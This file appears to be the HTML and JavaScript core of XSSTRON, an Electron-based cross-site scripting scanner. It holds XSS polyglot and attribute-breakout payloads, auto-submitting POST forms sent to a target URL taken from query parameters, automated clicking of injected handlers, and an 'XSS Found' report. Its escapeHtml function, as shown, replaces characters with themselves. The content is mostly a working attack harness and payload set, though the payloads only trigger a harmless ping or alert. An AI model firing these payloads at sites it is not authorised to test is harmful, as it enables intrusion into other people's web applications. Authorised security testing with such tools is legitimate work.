-
Notifications
You must be signed in to change notification settings - Fork 119
/
xssp.html
128 lines (94 loc) · 3.23 KB
/
xssp.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>XSSTRON</title>
</head>
<body>
<center><h3 style="color:magenta;font-size: 30px;">XSSTRON</h3>
<center><h3 id=xsx style="color:rgb(255, 0, 0);font-size: 25px;"></h3>
<h5 id=h5 style="color:rgb(1, 18, 255);font-size: 20px;"></h5>
<h5 id=h52 style="color:rgb(0, 255, 55);font-size: 20px;"></h5>
</center>
<script>
var htmlp = `javascript:/*xssx'">--></noscript></title></textarea></style></template></noembed><\/script><img src=x onerror=pinghost(1)//>*/;top.pinghost(2)//`
var jsj = `javascript:top.pinghost(1)`
var atrx = `x id=clx onclick=top.pinghost(1)// `
var atrx1 = `' id="clx" onclick="top.pinghost(1)//"" '`
var atrx2 = `" id=clx onclick=top.pinghost(1)// "`
var jsp1 = `'-top.pinghost(1)-'`
var jsp2 = `"-top.pinghost(1)-"`
var jsp3 = `\`-\${top.pinghost(1)}-\``
var ujs1 = `///xsstron.herokuapp.com/x.php`
var j = new URL(location).searchParams.get('shqlipqli')
var jd = new URL(location).searchParams.get('shqlipqlip')
document.getElementById('h5').innerHTML='URL Tested: <span style=color:black>'+j+'</span>'
document.getElementById('h52').innerHTML='Parameters Tested: <span style=color:black>'+decodeURIComponent(jd)+'</span>'
var w;
function escapeHtml(unsafe) {
return unsafe
.replace(/&/g, "&")
.replace(/</g, "<")
.replace(/>/g, ">")
.replace(/"/g, """)
.replace(/'/g, "'");
}
var state=0;
var swich=1;
function cw(x,y,z,v){
var queryDict = {}
z.split("&").forEach(function(item) {queryDict[item.split("=")[0]] = item.split("=")[1]})
var px='';
for (var key in queryDict) {
if (queryDict.hasOwnProperty(key)) {
px+='<input name="'+key+'"" value="'+escapeHtml(v)+'">'
}}
var url = `data:text/html;base64,${btoa(`<form action=${x+"#shetajyanmx"} method=POST>${px}<input type=submit></form><script>document.forms[0].lastElementChild.click()<\/script>`)}`
if(swich){
let w = document.createElement('webview')
w.setAttribute('src',url)
w.setAttribute('preload','./d.js')
w.setAttribute('id','htmlw')
w.setAttribute('enableRemoteModule','true')
document.body.appendChild(w)
w.addEventListener('ipc-message', event => {
urls=atob((url).split(',')[1]).replaceAll('pinghost','alert').replaceAll('#shetajyanmx','')
window.resizeTo(800, 600);
top.xsx.innerHTML+='XSS Found : <span style="color:black"><br><textarea style=font-size:17px rows=10 cols=70>data:text/html;base64,'+escapeHtml(decodeURIComponent(btoa(urls)))+'</textarea></span><br>'
state=1;
swich=0;
window.focus();
alert('XSS Found')
})
setTimeout(function(){
if(!state){
window.close();
}},6500);
if(y=23){
w.addEventListener('dom-ready', () => {
setTimeout(function(){
w.executeJavaScript(`var x= document.querySelector("[href^='javascript:/']"); if(x){x.click()}`)
w.executeJavaScript(`var x= document.querySelector('[onclick*=top]');if(x){x.click()}`)
}
,300);
})}
else{
setTimeout(function(){
w.remove();
},1000)
}}
}
setTimeout(() => {
cw(j,null,jd,htmlp)
cw(j,null,jd,jsj)
cw(j,23,jd,atrx)
cw(j,23,jd,atrx1)
cw(j,23,jd,atrx2)
cw(j,null,jd,jsp1)
cw(j,null,jd,jsp2)
cw(j,null,jd,jsp3)
cw(j,null,jd,ujs1)
}, 100);
</script>
</body>
</html>